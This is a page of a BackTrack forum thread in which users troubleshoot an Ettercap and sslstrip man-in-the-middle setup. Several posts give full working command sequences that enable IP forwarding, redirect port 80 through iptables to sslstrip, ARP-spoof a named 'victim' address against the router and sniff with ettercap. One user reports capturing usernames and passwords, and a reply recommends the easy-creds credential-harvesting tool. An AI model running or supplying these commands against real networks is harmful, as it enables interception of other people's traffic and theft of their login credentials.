Page 2 of 3 FirstFirst 123 LastLast
Results 11 to 20 of 23

Thread: Ettercap+Sslstrip

  1. #11
    Just burned his ISO
    Join Date
    May 2011
    Posts
    2

    Cool Re: Ettercap+Sslstrip

    This works perfekt in BT5 and Ubuntu:

    echo 1 > /proc/sys/net/ipv4/ip_forward

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    sslstrip -a -l 8080
    ettercap -C

  2. #12
    Senior Member
    Join Date
    Apr 2006
    Posts
    154

    Default Re: Ettercap+Sslstrip

    I'm stuck with ettercap....it won't catch anything...(but i can see everything inside log_ssl)

    here's what i do:

    echo 1 > /proc/sys/net/ipv4/ip_forward

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

    sslstrip -l 10000 -w log_ssl -p -a

    arpspoof -i eth0 -t 192.168.2.9 192.168.2.1 (192.168.2.9 is the victim,192.168.2.1 is the router, and YES, they are correct!)

    ettercap -T -q -i eth0

    I've uncommented the 2 "if you use iptables..." in etter.conf.

    I can't get any data inside the window running ettercap, but if I "cat" the log of sslstrip i can see data).

    Any idea????

  3. #13
    Very good friend of the forum maverik35's Avatar
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734

    Default Re: Ettercap+Sslstrip

    Quote Originally Posted by michelinok View Post
    I'm stuck with ettercap....it won't catch anything...(but i can see everything inside log_ssl)

    here's what i do:

    echo 1 > /proc/sys/net/ipv4/ip_forward

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

    sslstrip -l 10000 -w log_ssl -p -a

    arpspoof -i eth0 -t 192.168.2.9 192.168.2.1 (192.168.2.9 is the victim,192.168.2.1 is the router, and YES, they are correct!)

    ettercap -T -q -i eth0

    I've uncommented the 2 "if you use iptables..." in etter.conf.

    I can't get any data inside the window running ettercap, but if I "cat" the log of sslstrip i can see data).

    Any idea????
    Michelinoc, I'm affraid you are doing 2 things redundant, and I quote:
    1. You either forward traffic manually (like you just did: echo 1 > /proc/sys/net/ipv4/ip_forward) or
    this way: ettercap -T -q -i eth0...
    Please, I invite you to read the man ettercap : "If you use ettercap, automaticlly traffic is forwarded, and disable the forwarding from kernel
    (echo 1 > /proc/sys/net/ipv4ip_forward) if it was done previously, like you did. Please, check it this way if you do not belive:
    * Forward traffic (from kernel) manually (echo 1 > /proc/sys/net/ipv4/ip_forward)
    * then type: cat /proc/sys/net/ipv4/ip_forward
    You will see "1" meanning you forwarded correctly the traffic.
    * Then type ettercap -T -q -i eth0
    * Open another Terminal:
    Recheck the forwarding typing: cat /proc/sys/net/ipv4/ip_forward
    You will see "0"...Your forwarding was disabled, and now ettercap will forward for you...
    2. In sslstrip, you have some options by typing : sslstrip --help or -h
    -a Log all traffic (http and https).
    -p Log only SSL posts (default)
    -s Log only SSL to and from the server
    -l Port where will be listenning (default is 10000) So if you use 10000, you do not need to use the -l 10000, but you can use if you wish, no harm.
    You are conf the ssl strip to log all trafic and ssl posts,..at the end no harm is done, but one thing is for sure, we do not know the final result of using the 2 parameters since they do one thing: Log ssl...
    What I mean by "not knowing the final result" is we do not know "exactly how the sslstrip will behavior under those circumstances"..
    So, if you are to use something, I invite you to read instructions before using it...Please, take this advice: Do not use an instruction that someone posts or uses before knowing what they mean and what are they being used for, and then apply them if you think it will help you...
    Best of lucks.

  4. #14
    Senior Member
    Join Date
    Apr 2006
    Posts
    154

    Default Re: Ettercap+Sslstrip

    Thank you, i'll try your suggestions asap.
    And yes...i belive
    I knwo for sure that ssl (with those parameters) and with my "wrong" setup works ok, i'm just trying with my laptop, and all the traffic is forwared ok, ssl and normal http traffic, everything is trasparent and works ok!
    I think the problem is the "double" forward (i'll check this night, i'm at work atm) and i'll let you know.
    many thanks for the reply!

  5. #15
    Senior Member
    Join Date
    Apr 2006
    Posts
    154

    Default Re: Ettercap+Sslstrip

    I've tryed not echoing "1",but ettercap won't show anything, the traffic is forwarded welland i can see in the sslstrip's log the password,username,etc...(i'm testing with my laptop, and everythings is ok).
    Maybe i'm missing something...but what?

  6. #16
    Very good friend of the forum maverik35's Avatar
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734

    Default Re: Ettercap+Sslstrip

    Try to drop privs to actual user:
    If it is setup as 65535 (Nobody) try 0 (root) or try this:
    In the terminal type: xxx@bt> id
    It will give you your Id info, in my case is 1000
    uid=1000 and gid=1000
    If you are as root: xxx@bt#
    you will get uid=0 and gid=0

    So remember this: When first run ettercap, you need privileges to be able to open link layer sockets, so you run ettercap as Root (xxx@bt#) after loading ettercap, "all privs are "dropped to 65535 (nobody) or to the user you set up in the etter.conf...
    Ettercap write the log info in a directory with permissions, in this case, you..your Id..
    Now I'll post the part of the ettercap manual which says so, and I quote:

    PRIVILEGES DROPPING
    ettercap needs root privileges to open the Link Layer sockets. After the initialization phase, the root privs are not needed anymore, so ettercap drops them to UID =
    65535 (nobody). Since ettercap has to write (create) log files, it must be executed in a directory with the right permissions (e.g. /tmp/). If you want to drop privs
    to a different uid, you can export the environment variable EC_UID with the value of the uid you want to drop the privs to (e.g. export EC_UID=500) or set the cor‐
    rect parameter in the etter.conf file.

    Try this...May help...Just try to follow the ettercap manual...I've read it many, many times, day after day just to make it work, perhaps it wont work 100%, but I can assure you something, many many doubts you had, will be answered...
    Best of lucks...

  7. #17
    Senior Member
    Join Date
    Apr 2006
    Posts
    154

    Default Re: Ettercap+Sslstrip

    Hi Maverik35!
    Thanks for the suggestion...it did the trick for 50%...
    it works for https traffic (transparent and everything is ok!!!! finally!), but it's strange that it doesn't work for normal http pages...
    I've taken a look at the options of sslstrip, and i'm logging everithing (ssl and http traffic since i'm using this: sslstrip -a -k -f ).
    It's strange because ettercap works ok and it's doing it's "sniffing" correctly except for the http.
    Any idea?


    PS : Thanks for the above trick, it's strange because in bt4 i didn't had any problem using ettercap (of course,i did never tryed sslstrip)

  8. #18
    Very good friend of the forum maverik35's Avatar
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734

    Default Re: Re : Re: Ettercap+Sslstrip

    Hi..Try this to see if it helps:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port "port you want to redirect traffic to" -i "your iface"
    This parameter is to be used only with chains: PREROUTING, INPUT and FORWARD of the table nat..The specification of the interface is to know the name of interface via which a packet was received..So maybe it might help..Sometimes I use it..So you are using the table "nat" and Appending "A" a new rule to the PREROUTING Chain, which is -p tcp --destination-port 80.

    To see the all traffic, you can use the --write option in ettercap (exmple: --write my_traffic). It will create a my_traffic.pcap and read it with wireshark or use option -r in ettercap to read it once you stop the sniffing.
    Hope this helps...Best of luck.
    Last edited by maverik35; 06-16-2011 at 04:17 PM.

  9. #19
    Senior Member
    Join Date
    Apr 2006
    Posts
    154

    Default Re: Ettercap+Sslstrip

    No way...
    I'm really stuck...

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 -i eth0
    arpspoof -i eth0 -t 192.168.2.9 192.168.2.1 (192.168.2.9 is the victim,192.168.2.1 is the router, and YES, they are correct!)
    sslstrip -a -k -f
    ettercap -T -q -i eth0

    Sometimes i get some info on ettercap,sometimes not...maybe my router is not so simple to arp poisoning?

  10. #20
    Senior Member
    Join Date
    Dec 2010
    Posts
    127

    Default Re: Ettercap+Sslstrip

    Or you can just run easy-creds and not have to worry about any of this....

    Do a Google search for easy-creds and your good to go.

    Easy-creds is now in the BT5 repos. Just apt-get install easy-creds

    Then you're good to go.
    Last edited by ericmilam; 11-20-2011 at 01:45 AM.

Page 2 of 3 FirstFirst 123 LastLast

Similar Threads

  1. Problema con Ettercap & Sslstrip
    By mapoetto in forum Discussioni Generali
    Replies: 1
    Last Post: 04-14-2011, 10:30 PM
  2. Ettercap and Sslstrip problem
    By f4llcon in forum Beginners Forum
    Replies: 5
    Last Post: 11-02-2010, 05:26 PM
  3. problems with arpspoof, sslstrip, ettercap
    By username324 in forum Beginners Forum
    Replies: 9
    Last Post: 03-12-2010, 12:02 AM
  4. ettercap & sslstrip question
    By mroy1300 in forum OLD Newbie Area
    Replies: 0
    Last Post: 02-01-2010, 01:55 AM
  5. Ettercap & SslStrip (Attacking the Masses)
    By htons139 in forum OLD BackTrack3 Howtos
    Replies: 11
    Last Post: 01-11-2010, 02:16 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •